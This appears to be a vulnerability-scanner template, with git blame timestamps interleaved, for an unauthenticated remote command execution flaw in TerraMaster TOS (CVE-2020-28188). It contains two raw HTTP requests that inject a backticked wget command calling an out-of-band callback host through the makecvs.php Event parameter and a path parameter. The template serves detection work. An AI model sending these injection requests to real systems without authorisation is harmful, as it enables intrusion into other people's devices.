2021-07-19 06:13:57 +00:00
id : CVE-2020-28188
info :
name : TerraMaster TOS - Unauthenticated Remote Command Execution
author : gy741
severity : critical
description : Remote Command Execution (RCE) vulnerability in TerraMaster TOS <= 4.2.06 allow remote unauthenticated attackers to inject OS commands via /include/makecvs.php in Event parameter.
2021-08-18 11:37:49 +00:00
reference :
2021-07-19 06:13:57 +00:00
- https://www.ihteam.net/advisory/terramaster-tos-multiple-vulnerabilities/
- https://www.pentest.com.tr/exploits/TerraMaster-TOS-4-2-06-Unauthenticated-Remote-Code-Execution.html
2021-07-19 11:11:12 +00:00
- https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/
2021-07-19 06:13:57 +00:00
tags : cve,cve2020,terramaster,rce,oob
requests :
- raw :
- |
GET /include/makecvs.php?Event=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host : {{Hostname}}
2021-09-08 12:17:19 +00:00
- |
2021-07-19 06:13:57 +00:00
GET /tos/index.php?explorer/pathList&path=%60wget%20http%3A%2F%2F{{interactsh-url}}%60 HTTP/1.1
Host : {{Hostname}}
matchers :
- type : word
part : interactsh_protocol # Confirms the HTTP Interaction
words :
- "http"